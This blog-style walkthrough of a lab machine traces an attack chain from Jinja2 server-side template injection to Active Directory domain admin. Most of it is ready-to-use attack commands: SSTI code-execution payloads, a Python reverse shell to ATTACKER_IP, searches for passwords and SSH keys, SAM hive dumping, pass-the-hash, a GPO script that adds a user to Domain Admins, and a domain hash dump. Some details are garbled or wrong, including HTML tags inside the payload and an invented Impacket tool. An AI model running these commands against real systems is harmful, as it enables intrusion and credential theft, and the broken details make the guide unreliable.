From SSTI to Domain Admin: The Complete Odyssey of a Cross-Platform Active Directory Attack Chain + Video

Listen to this Post

Featured Image

Introduction:

Modern enterprise networks are heterogeneous environments, and a sophisticated attack chain often traverses both Linux and Windows systems to achieve a total domain compromise. The “Odyssey” Hack Smarter Labs machine demonstrates this stark reality, showcasing how a single vulnerability in an external-facing Linux application can be the initial thread pulled to unravel an entire Windows Active Directory domain. This article deconstructs the full kill chain, from Server-Side Template Injection (SSTI) to ultimate Domain Administrator privileges, providing the technical commands and methodology used at each stage.

Learning Objectives:

  • Understand how to identify and exploit SSTI vulnerabilities on a Linux web server to gain initial foothold and root access.
  • Learn techniques for credential extraction from a compromised Linux host and pivoting to a Windows domain-joined workstation.
  • Master the process of abusing Backup Operators group privileges and exploiting misconfigured Group Policy Objects (GPOs) for domain escalation.
  1. Initial Foothold: Exploiting SSTI on the Linux Web Server
    The attack begins with the discovery of a Server-Side Template Injection (SSTI) vulnerability in the exposed web application. SSTI allows an attacker to inject malicious template expressions, which are then executed on the server, potentially leading to Remote Code Execution (RCE).

Step‑by‑step guide:

  1. Reconnaissance and Identification: First, probe the web application for templating engines (Jinja2, Twig, Freemarker, etc.). A common technique is to inject simple mathematical expressions like `{{77}}` and observe if the output is 49.
    Example curl request to test for SSTI
    curl -s "http://TARGET_IP/search?q=%7B%7B77%7D%7D" | grep -i "49"
    
  2. Confirm and Identify Engine: Once potential SSTI is found, identify the specific template engine. Payloads differ per engine.
    Testing for Jinja2 -尝试访问基本Python对象
    curl -s "http://TARGET_IP/search?q=%7B%7Bconfig.items%28%29%7D%7D"
    
  3. Craft RCE Payload: For Jinja2, a common RCE payload leverages Python’s `os.popen` or the `subprocess` module.
    URL-encoded payload to execute a command (e.g., 'id')
    Final payload: {{ self.<strong>init</strong>.<strong>globals</strong>.<strong>builtins</strong>.<strong>import</strong>('os').popen('id').read() }}
    curl -G --data-urlencode "q={{ self.<strong>init</strong>.<strong>globals</strong>.<strong>builtins</strong>.<strong>import</strong>('os').popen('id').read() }}" http://TARGET_IP/search
    
  4. Establish a Reverse Shell: Use the RCE to launch a reverse shell connection back to your attack machine for stable access.
    Craft a payload to spawn a reverse shell using netcat or Python
    Example Python reverse shell payload
    cmd="python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    Inject the URL-encoded version of this command via the SSTI
    

2. Post-Exploitation: Escalation and Credential Harvesting on Linux

With RCE achieved, the next step is to escalate privileges to root and search for credentials that can facilitate movement into the Windows domain.

Step‑by‑step guide:

  1. Privilege Escalation to Root: Enumerate the Linux system for misconfigurations.
    Check sudo permissions
    sudo -l
    Check for SUID binaries
    find / -perm -4000 -type f 2>/dev/null
    Check for world-writable files
    find / -perm -o=w -type f 2>/dev/null 2>/dev/null
    Check for processes running as root
    ps aux | grep root
    
  2. Credential Discovery: As root, search the filesystem, history files, and configuration files for passwords or keys.
    Search for files containing the word "password"
    grep -r -i "password" /etc /home /opt 2>/dev/null | head -20
    Check for SSH keys
    find / -name "id_rsa" -o -name "id_dsa" -o -name ".pem" 2>/dev/null
    Examine web application configuration files (config.php, .env files)
    find /var/www /opt -name ".php" -o -name ".env" -o -name "config." 2>/dev/null | xargs grep -l "pass" 2>/dev/null
    
  3. Extract and Decrypt Credentials: Use found database connection strings or hashes. For example, credentials might be stored in a `config.php` file for a database that also contains user hashes from the Windows domain if a service account is used.

  4. Lateral Movement: Pivoting to the Windows Domain Workstation
    The credentials extracted (likely a domain user account) are used to access a Windows workstation within the Active Directory (AD) environment.

Step‑by‑step guide:

  1. Verify Domain Access: Use the credentials with tools like `crackmapexec` to verify access and gather initial information about the workstation.
    On the attacker's Linux machine
    crackmapexec smb WORKSTATION_IP -u 'DOMAIN_USER' -p 'PASSWORD' --shares
    
  2. Establish a Foothold on Windows: If the user has administrative access to the workstation, use `psexec.py` or `wmiexec.py` from the Impacket suite to execute commands.
    Gain a semi-interactive shell on the Windows host
    python3 /usr/share/doc/python3-impacket/examples/wmiexec.py DOMAIN/USER:PASSWORD@WORKSTATION_IP
    
  3. Initial Enumeration: From the command shell, perform basic enumeration of the user’s context and the system.
    whoami /all
    systeminfo
    net user DOMAIN_USER /domain
    

4. Privilege Escalation: Abusing Backup Operators Group

The compromised domain user is found to be a member of the Backup Operators local group on the workstation. This group is granted the `SeBackupPrivilege` and SeRestorePrivilege, which can be abused to read any file on the system, including the security database which stores local password hashes.

Step‑by‑step guide:

  1. Enumerate Group Membership: Confirm the user’s membership in the Backup Operators group.
    net localgroup "Backup Operators"
    
  2. Dump Local SAM Hashes: Use tools that leverage `SeBackupPrivilege` to access the `C:\Windows\System32\config\SAM` and `SYSTEM` hive files remotely.
    On the attacker's machine, use secretsdump.py with the user's credentials.
    Impacket's secretsdump can use the Backup Operators privilege if the user has local admin rights (which this group does not grant by default). The correct method is to copy the registry hives.
    However, a more direct method if you have RCE is to use built-in Windows tools:
    In your wmiexec shell, save the registry hives:
    reg save hklm\sam C:\temp\sam.save
    reg save hklm\system C:\temp\system.save
    Then download these files to your attacker machine and use secretsdump offline.
    
  3. Extract Hashes with Impacket: Once the hive files are on your Kali machine, extract the hashes.
    python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -system system.save LOCAL
    
  4. Pass-the-Hash: Use the dumped NTLM hash of a local administrator account to gain elevated privileges on the workstation.
    crackmapexec smb WORKSTATION_IP -u 'Administrator' -H 'NTLM_HASH' --local-auth
    wmiexec.py -hashes :NTLM_HASH Administrator@WORKSTATION_IP
    

5. Domain Dominance: Exploiting Excessive GPO Permissions

With local administrator access on a domain-joined machine, further enumeration reveals the compromised user has excessive permissions over a Group Policy Object (GPO) linked to the Domain Controller (DC). An attacker can modify this GPO to execute malicious code on the DC in the context of SYSTEM.

Step‑by‑step guide:

  1. Enumerate User’s AD Permissions: Use BloodHound or manual PowerShell commands to discover control over GPOs.
    From a PowerShell session on the compromised workstation (as domain admin)
    Import-Module ActiveDirectory
    Get-ADUser -Identity USERNAME -Properties  | Select-Object -ExpandProperty DistinguishedName
    Use AD ACL scanning tools like PowerView
    Find-InterestingDomainAcl -ResolveGUIDs | Where-Object { $_.IdentityReferenceName -eq 'USERNAME' }
    
  2. Modify the GPO: If you have write permissions on a GPO linked to a DC, you can embed a startup/shutdown script or schedule a task.
    On attacker machine, use impacket's `gpobehavior` or Microsoft's `Group Policy Management Console` remotely.
    A common method is to use the `Set-GPPrefRegistryValue` cmdlet to point a registry-based preference to a batch file on an SMB share you control.
    
  3. Forge the Payload: Create a malicious script (script.bat) that adds your user to the Domain Admins group or dumps DC secrets.
    REM script.bat
    net group "Domain Admins" ATTACKER_USER /add /domain
    
  4. Trigger Policy Application and Reap Rewards: Force a group policy update on the DC and wait for execution.
    From your shell, force GP update on the DC (requires admin on DC)
    gpupdate /force
    Or wait for the scheduled refresh (90 minutes + random offset).
    Verify your new membership
    net user ATTACKER_USER /domain
    
  5. Final Compromise – Dump Domain Hashes: With Domain Admin rights, perform a full domain hash dump using secretsdump.py.
    python3 /usr/share/doc/python3-impacket/examples/secretsdump.py DOMAIN/ATTACKER_USER:PASSWORD@DOMAIN_CONTROLLER_IP
    

What Undercode Say:

  • The Attack Chain is King: This engagement underscores that professional red teaming and advanced persistent threats (APTs) are rarely about a single “silver bullet” exploit. Success lies in chaining together smaller, often overlooked vulnerabilities across different system types (Linux app server → Windows workstation → Windows DC). Defenders must monitor for anomalous cross-platform traversal, not just isolated alerts.
  • Permission Over Privilege: The critical escalation vectors were not zero-days but misconfigurations: a service account with excessive GPO permissions and a user in the Backup Operators group. This highlights a pervasive issue in enterprise security: over-permissioned service accounts and the misunderstanding of powerful built-in groups like Backup Operators, which should be treated as tier-0 (domain-level) assets.

Prediction:

The “Odyssey” attack chain provides a blueprint for future real-world compromises. We predict a significant rise in automated attack platforms that will specialize in cross-platform exploit chaining. Tools will increasingly integrate Linux privilege escalation, Windows credential attack libraries (like Mimikatz functionality), and AD enumeration modules (like BloodHound logic) into a single, seamless workflow. Furthermore, as Identity and Access Management (IAM) becomes more centralized, we will see a shift in attacker focus toward compromising cloud-based identity providers (like Entra ID) through similar logic flaws and misconfigurations in permission delegation, making the post-exploitation phase potentially even more devastating. The defense will require equally integrated detection strategies that correlate events across OSI layers and system boundaries.

▶️ Related Video (78% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Amine Nait – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky